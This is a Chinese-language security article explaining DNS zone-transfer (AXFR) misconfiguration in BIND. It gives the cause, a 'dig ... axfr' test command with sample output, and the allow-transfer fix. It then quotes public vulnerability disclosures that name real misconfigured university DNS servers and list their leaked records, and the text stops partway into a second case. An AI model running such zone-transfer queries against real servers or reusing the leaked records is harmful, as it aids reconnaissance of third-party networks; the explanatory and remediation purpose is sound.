0x00 相關背景介紹
Dns是整個互聯網公司業務的基礎,目前越來越多的互聯網公司開始自己搭建DNS服務器做解析服務,同時由於DNS服務是基礎性服務非常重要,因此很多公司會對DNS服務器進行主備配置而DNS主備之間的數據同步就會用到dns域傳送,但如果配置不當,就會導致任何匿名用戶都可以獲取DNS服務器某一域的所有記錄,將整個企業的基礎業務以及網絡架構對外暴露從而造成嚴重的信息泄露,甚至導致企業網絡被滲透。
0x01 成因
DNS服務器的主備數據同步,使用的是域傳送功能。 域傳送關鍵配置項為:
allow-transfer {ipaddress;}; 通過ip限制可進行域傳送的服務器
allow-transfer { key transfer; }; 通過key限制可進行域傳送的服務器
設置方式為兩種:一種設置在options配置域;一種設置在zone配置域。優先級為如果zone沒有進行配置,則遵守options的設置。如果zone進行了配置,則遵守zone的設置。
options配置如下:
options {
listen-on { 1.1.1.1; };
listen-on-v6 { any; };
directory "/bind";
pid-file "/bind/run/pid";
dump-file "/bind/data/named_dump.db";
statistics-file "/bind/data/named.stats";
allow-transfer { any; };
allow-query {any;};
};
zone配置如下:
zone "wooyun.org" {
type master;
file "/bind/etc/wooyun.org.conf";
allow-transfer {any;};
};
筆者測試版本為BIND 9.8.2rc1-RedHat-9.8.2-0.10.rc1.el6_3.6,默認安裝完畢后,配置項沒有allow-transfer 項。如果直接使用默認配置文件進行配置的話(不手動添加allow-transfer項),就會存在dns 域傳送漏洞。
0x02 攻擊方式及危害
惡意用戶可以通過dns域傳送獲取被攻擊域下所有的子域名。會導致一些非公開域名(測試域名、內部域名)泄露。而泄露的類似內部域名,其安全性相對較低,更容易遭受攻擊者的攻擊,比較典型的譬如內部的測試機往往就會缺乏必要的安全設置。
攻擊者進行測試的成本很低,如dns服務器IP:1.1.1.1 測試域名為wooyun.org,測試命令如下:
# dig @1.1.1.1 wooyun.org axfr #就可以看到返回結果類似如下:
; <<>> DiG 9.7.3 <<>> @1.1.1.1 wooyun.org axfr
; (1 server found)
;; global options: +cmd
wooyun.org. 86400 IN SOA wooyun.org. rname.invalid. 0 86400 3600 604800 10800
wooyun.org. 86400 IN NS wooyun.org.
wooyun.org. 86400 IN A 127.0.0.1
wooyun.org. 86400 IN AAAA ::1
test.wooyun.org. 86400 IN A 1.1.1.1
xxx.wooyun.org. 86400 IN A 2.2.2.2
wooyun.org. 86400 IN SOA wooyun.org. rname.invalid. 0 86400 3600 604800 10800
0x03 實際案例
0x04 修復方案
解決域傳送問題非常簡單,只需要在相應的zone、options中添加allow-transfer限制可以進行同步的服務器就可以了,可以有兩種方式:限制IP、使用key認證。
舉個實例
漏洞詳情
披露狀態:
2015-05-25: 細節已通知廠商並且等待廠商處理中
2015-05-30: 廠商已經主動忽略漏洞,細節向公眾公開
簡要描述:
DNS配置不當,造成一些非公開域名泄露
詳細說明:
0x00.惡意用戶可以通過dns域傳送獲取被攻擊域下所有的子域名。會導致一些非公開域名(測試域名、內部域名)泄露。而泄露的類似內部域名,其安全性相對較低,更容易遭受攻擊者的攻擊,比較典型的譬如內部的測試機往往就會缺乏必要的安全設置.
該配置不當的DNS Server為:dns2.etone.edu.cn
漏洞證明:
code 區域
shop.edu.cn. IN AXFR
;ANSWER
shop.edu.cn. 86400 IN SOA shop.edu.cn. qikw.cernet.com. 2015052201 86400 3600 604800 10800
shop.edu.cn. 86400 IN MX 10 mail.shop.edu.cn.
shop.edu.cn. 86400 IN NS dns1.etone.edu.cn.
shop.edu.cn. 86400 IN NS dns2.etone.edu.cn.
shop.edu.cn. 86400 IN TXT "v=spf1 ip4:59.64.112.160 59.64.112.161 -all"
shop.edu.cn. 86400 IN A 117.79.83.205
852214867.shop.edu.cn. 86400 IN CNAME domains.live.com.
default._domainkesy.shop.edu.cn. 86400 IN TXT "v=DKIM1; g=*; k=rsa; p=MIGfMA0GCSqGSIb3DQEBAQUAA4GNADCBiQC82/U8cXL5DKtFf9XTBSJTWUWnpGjzBf5da5TTdhL11OEhU6MorlH0iCgd8P6M9X8i4wQFk1nDvrsKdEdGWxLW4BaGko5b7eIDzI9lfeqWV2zrfJ6DB4zcca4AVgZBLhB757kq475508LWD1zIqRAQSVC4cJgMTywIDAQAB"
abc.shop.edu.cn. 86400 IN MX 10 1882003221.pamx1.hotmail.com.
all.shop.edu.cn. 86400 IN A 117.79.83.206
api.shop.edu.cn. 86400 IN A 117.79.83.205
api2.shop.edu.cn. 86400 IN A 117.79.83.205
修復方案:
使用IP或者Key設置allow-transfer 的ACL
實例二
漏洞詳情
披露狀態:
2015-05-21: 細節已通知廠商並且等待廠商處理中
2015-05-26: 廠商已經主動忽略漏洞,細節向公眾公開
簡要描述:
gzhtcm.edu.cn DNS服務器配置不當,導致信息泄露。
詳細說明:
